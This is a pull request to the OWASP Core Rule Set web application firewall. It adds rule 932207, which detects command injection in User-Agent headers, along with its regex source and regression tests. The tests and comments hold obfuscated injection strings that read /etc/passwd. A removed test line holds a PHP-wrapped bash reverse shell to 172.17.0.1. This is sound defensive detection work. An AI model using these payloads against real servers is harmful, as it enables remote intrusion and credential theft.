### PR TITLE
fix: separate rule for RCE detection in User-Agent header

### DIFF
--- a/regex-assembly/932207.ra
+++ b/regex-assembly/932207.ra
@@ -1,0 +1,29 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Prefix to prevent the first `?` (query string marker
+##! in URLs) from matching any of the later expressions.
+##! If the URL does not have a query string, then instead
+##! look for the first `;`.
+##! Prefix and suffix markers also form two capture groups
+##! that are used for processing and logging in the rule.
+##!^ ^[^.]+\.[^?;]+[?;](.*(
+##!$ ))
+
+##! The following expressions in this file must be identical to the
+##! ones in 932200.
+
+##! - bar;cd+/etc;/bin$u/ca*+passwd
+##! - foo;ca\t+/et\c/pa\s\swd
+##! - foo;c'at'+/etc/pa's'swd
+[*?`\x5c'][^/\n]+/
+/[^/]+?[*?`\x5c']
+##! - foo;cat$u+/etc$u/passwd
+##! - foo;c$-at+/et$-c/pas$-swd
+##! - foo;c$_at+/et$_c/pas$_swd
+##! - foo;c$?at+/et$?c/pas$?swd
+##! - foo;c$*at+/et$*c/pas$*swd
+##! - foo;c$@at+/et$@c/pas$@swd
+##! - foo;c$!at+/et$!c/pas$!swd
+##! - foo;c$$at+/et$$c/pas$$swd
+\$[({\[#@!?*\-_$a-zA-Z0-9]

--- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -959,7 +959,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?:\$(?:\((?:\(.
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932200
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]" \
     "id:932200,\
     phase:2,\
     block,\
@@ -992,6 +992,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 #
 # Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200
 # and must be handled with additional checks.
+# This rule targets either the query string of a URL or a URL followed by a semi-colon,
+# e.g., `www.google.com;c$$at+/et$$c/pas$$swd`.
 #
 # Regular expression generated from regex-assembly/932205.ra.
 # To update the regular expression run the following shell script
@@ -1031,6 +1033,8 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]+\.[^;\?]+[;\?](.*(['\*\?\x5c`][^\n/]
 #
 # Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200
 # and must be handled with additional checks.
+# This rule targets any string that is not an URL (very roughly) complementing the detection
+# in 932205.
 #
 # Regular expression generated from regex-assembly/932206.ra.
 # To update the regular expression run the following shell script
@@ -1061,6 +1065,47 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*
         "t:none,t:urlDecodeUni,\
         chain"
         SecRule MATCHED_VAR "@rx \s" \
+            "t:none,t:urlDecodeUni,\
+            setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+            setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Rule 932207 ]=-
+#
+# Sibling of 932200 targeting the User-Agent header. URLs cause false positives in rule 932200
+# and must be handled with additional checks.
+# This rule targets either the query string of a URL or a URL followed by a semi-colon,
+# e.g., `www.google.com;c$$at+/et$$c/pas$$swd`.
+#
+# Regular expression generated from regex-assembly/932207.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+#   crs-toolchain regex update 932207
+#
+SecRule REQUEST_HEADERS:User-Agent "@rx ^[^\.]+\.[^;\?]+[;\?](.*(['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]))" \
+    "id:932207,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:lowercase,t:urlDecodeUni,\
+    msg:'RCE Bypass Technique',\
+    logdata:'Matched Data: %{TX.2} found within %{TX.932205_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-multi',\
+    tag:'platform-multi',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/2',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/88',\
+    tag:'PCI/6.5.2',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
+    severity:'CRITICAL',\
+    setvar:'tx.932205_matched_var_name=%{matched_var_name}',\
+    chain"
+    SecRule TX:1 "@rx /" \
+        "t:none,t:urlDecodeUni,\
+        chain"
+        SecRule TX:1 "@rx \s" \
             "t:none,t:urlDecodeUni,\
             setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
             setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
@@ -265,7 +265,7 @@ tests:
           output:
             log_contains: id "932200"
   - test_title: 932200-17
-    desc: "RCE in request headers referer and user-agent"
+    desc: "False positive detection of RCE in Referer header"
     stages:
       - stage:
           input:
@@ -273,15 +273,16 @@ tests:
             headers:
               Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
               Host: localhost
-              User-Agent: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
+              User-Agent: "OWASP CRS test agent"
+              Referer: "www.google.com;/bin/ca?+/et*/passwd"
             method: GET
             port: 80
             uri: /
             version: HTTP/1.0
           output:
-            log_contains: id "932200"
+            no_log_contains: id "932200"
   - test_title: 932200-18
-    desc: False positive test against query string and space in a parameter
+    desc: "False positive detection of RCE in User-Agent header"
     stages:
       - stage:
           input:
@@ -289,16 +290,15 @@ tests:
             headers:
               Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
               Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Referer: "http://www.example.com/page?param=test+test"
+              User-Agent: "www.google.com;/bin/ca?+/et*/passwd"
             method: GET
             port: 80
-            uri: /get
+            uri: /
             version: HTTP/1.0
           output:
             no_log_contains: id "932200"
   - test_title: 932200-19
-    desc: False positive test against query string and space in path
+    desc: False positive test against query string start (matched "sezione.jsp")
     stages:
       - stage:
           input:
@@ -307,10 +307,9 @@ tests:
               Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
               Host: localhost
               User-Agent: "OWASP CRS test agent"
-              Referer: "http://www.example.com/page%20test?param=test"
             method: GET
             port: 80
-            uri: /get
+            uri: /get?foo=https://example.com/sezione.jsp?id=17&lb=chi%20siamo&idx=1234
             version: HTTP/1.0
           output:
             no_log_contains: id "932200"

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932207.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932207.yaml
@@ -1,0 +1,87 @@
+---
+meta:
+  author: "Max Leske"
+  description: RCE Bypass
+  enabled: true
+  name: 932207.yaml
+tests:
+  - test_title: 932207-1
+    desc: User-Agent without query string, trying to evade query string match
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "www.google.com;c$?at+/etc/passwd"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932207"
+  - test_title: 932207-2
+    desc: User-Agent header with query string and obvious payload
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "www.google.com?param=;/bin/ca?+/et*/passwd"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932207"
+  - test_title: 932207-3
+    desc: User-Agent header with canonical path, query string and obvious payload
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "www.google.com/?param=;/bin/ca?+/et*/passwd"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932207"
+  - test_title: 932207-4
+    desc: False positive test against query string and space in a parameter
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "http://www.example.com/page?param=test+test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932207"
+  - test_title: 932207-5
+    desc: False positive test against query string and space in path
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "http://www.example.com/page%20test?param=test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932207"


### PR DESCRIPTION
Rule 932200 detects RCEs in the User-Agent header (apart from ARGS etc.). Because the User-Agent header is essentially a free-form field, 932200 produces many FPs with common user agents.

Move the RCE detection in the User-Agent header to a separate rule, akin to the special detection already implemented for the Referer header. Only target URL-like values in the User-Agent, as any other detection is too generic (e.g., the equivalent of rule 932206 doesn't work for the User-Agent header).

Fixes #3163